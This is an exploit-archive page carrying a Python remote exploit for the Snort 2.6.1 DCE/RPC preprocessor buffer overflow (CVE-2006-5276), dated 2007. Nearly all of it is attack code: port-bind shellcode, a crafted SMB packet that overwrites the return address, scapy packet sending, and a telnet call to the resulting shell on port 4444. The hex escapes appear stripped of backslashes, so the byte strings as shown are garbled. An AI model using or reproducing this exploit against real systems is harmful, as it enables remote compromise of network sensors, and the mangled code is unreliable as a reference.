Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit (linux)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit (linux)
# Published : 2007-03-30
# Author : Winny Thomas
# Previous Title : ActSoft DVD-Tools (dvdtools.ocx) Remote Buffer Overflow Exploit
# Next Title : dproxy-nexgen Remote Root Buffer Overflow Exploit (x86-lnx)

#!/usr/bin/python
#
# Remote exploit for Snort DCE/RPC preprocessor vulnerability as described in
# CVE-2006-5276. The exploit binds a shell to TCP port 4444 and connects to it.
# This code was tested against snort-2.6.1 running on Red Hat Linux 8
#
# Author shall bear no responsibility for any screw ups caused by using this code
# Winny Thomas :-)

import os
import sys
import time
from scapy import *

# Linux portbind shellcode; Binds shell on TCP port 4444
shellcode  = "x31xdbx53x43x53x6ax02x6ax66x58x99x89xe1xcdx80x96"
shellcode += "x43x52x66x68x11x5cx66x53x89xe1x6ax66x58x50x51x56"
shellcode += "x89xe1xcdx80xb0x66xd1xe3xcdx80x52x52x56x43x89xe1"
shellcode += "xb0x66xcdx80x93x6ax02x59xb0x3fxcdx80x49x79xf9xb0"
shellcode += "x0bx52x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x52x53"
shellcode += "x89xe1xcdx80"

def ExploitSnort(target):
       # SMB packet borrowed from http://www.milw0rm.com/exploits/3391
       # NetBIOS Session Service
       smbreq = "x00x00x02xab"

       # SMB Header
       smbreq += "xffx53x4dx42x75x00x00x00x00x18x07xc8x00x00"
       smbreq += "x00x00x00x00x00x00x00x00x00x00x00x00xffxfe"
       smbreq += "x00x08x30x00"

       # Tree Connect AndX Request
       smbreq += "x04xa2x00x52x00x08x00x01x00x27x00x00"
       smbreq += "x5cx00x5cx00x49x00x4ex00x53x00x2dx00x4bx00x49x00"
       smbreq += "x52x00x41x00x5cx00x49x00x50x00x43x00x24x00x00x00"
       smbreq += "x3fx3fx3fx3fx3fx00"

       # NT Create AndX Request
       smbreq += "x18x2fx00x96x00x00x0ex00x16x00x00x00x00x00x00x00"
       smbreq += "x9fx01x02x00x00x00x00x00x00x00x00x00x00x00x00x00"
       smbreq += "x03x00x00x00x01x00x00x00x40x00x40x00x02x00x00x00"
       smbreq += "x01x11x00x00x5cx00x73x00x72x00x76x00x73x00x76x00"
       smbreq += "x63x00x00x00"

       # Write AndX Request #1
       smbreq += "x0ex2fx00xfex00x00x40x00x00x00x00xffxffxffxffx80"
       smbreq += "x00x48x00x00x00x48x00xb6x00x00x00x00x00x49x00xee"
       smbreq += "x05x00x0bx03x10x00x00x00x10x02x00x00x01x00x00x00"
       smbreq += "xb8x10xb8x10x00x00x00x00x01x00x00x00x00x00x01x00"
       smbreq += "xc8x4fx32x4bx70x16xd3x01x12x78x5ax47xbfx6exe1x88"
       smbreq += "x03x00x00x00x04x5dx88x8axebx1cxc9x11x9fxe8x08x00"
       smbreq += "x2bx10x48x60x02x00x00x00"

       # Write AndX Request #2
       smbreq += "x0exffx00xdexdex00x40x00x00x00x00xffxffxffxffx80"
       smbreq += "x00x48x00x00x00xffx01xcex01x00x00x00x00x49x00xee"
       smbreq += "xedx1ex94x7cx90x81xc4xffxefxffxffx44"
       smbreq += "x31xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13xa9"
       # The following address overwrites RET and points into our shellcode
       smbreq += struct.pack('<L', 0xbfffeff0)
       smbreq += 'x90' * 50
       smbreq += shellcode
       smbreq += 'x90' * 130

       packet = IP(dst=target) / TCP(sport=1025, dport=139, flags="PA") / smbreq
       send(packet)

def ConnectRemoteShell(target):
       connect = '/usr/bin/telnet ' + target + ' 4444'
       os.system(connect)

if __name__ == '__main__':
       try:
               target = sys.argv[1]
       except IndexError:
               print 'Usage: %s <ip of a host on snort network>' % sys.argv[0]
               sys.exit(-1)

       print '[+] Sending malformed SMB packet'
       ExploitSnort(target)
       print '[+] Connecting to remote shell in 3 seconds...'
       time.sleep(3)
       ConnectRemoteShell(target)

# www.Syue.com [2007-03-30]